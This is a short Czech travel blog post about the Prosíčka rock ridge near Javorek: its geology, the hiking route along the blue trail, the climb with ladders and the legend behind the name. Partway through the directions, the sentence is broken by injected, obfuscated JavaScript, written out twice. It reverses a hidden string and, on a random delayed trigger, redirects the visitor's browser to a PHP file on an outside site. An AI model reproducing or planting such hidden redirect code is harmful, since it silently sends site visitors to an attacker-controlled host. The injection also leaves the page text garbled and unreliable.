Rainbow page separator

Prosíčka

Úterý, 21. července 2009

Prosíčka - skalnatý hřbet v nadmořské výšce 739 m, který byl v roce 1988 byl vyhlášen přírodní památkou. Skalní útvary jsou tvořeny dvěma mohutnými skalními bloky s délkou 55 m a výškou až 17 m, na něž navazuje řada nižších prosicka1rozvětralých výchozů, zbytků skalní hradby. Pod skalami se nachází odlámané suťové haldy a kamenné moře, vzniklé spojením tří balvanových proudů.

Chcete-li se k Prosíčce  dostat,  jeďte nejlépe autem do vesničky Javorek.  Odtud se vydejte po modré značce. Polní cesta Vás zavede do malebné krajiny lesů, luk a strání. Ces["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou možná potkáte jezdce na koních z místní stáje Sága.

Výstup na skalnatý vrchol je za pomoci ocelového lana a žebříků, odměnou vám bude nádherný výhled k Jimramovu, údolí Fryšávky, Sněžnému a k Vírské přehradě.

 

A proč právě název Prosíčka? Podle legendy sem lidé v době sucha chodili prosit o vodu.

prosicka4  

mapa Prosička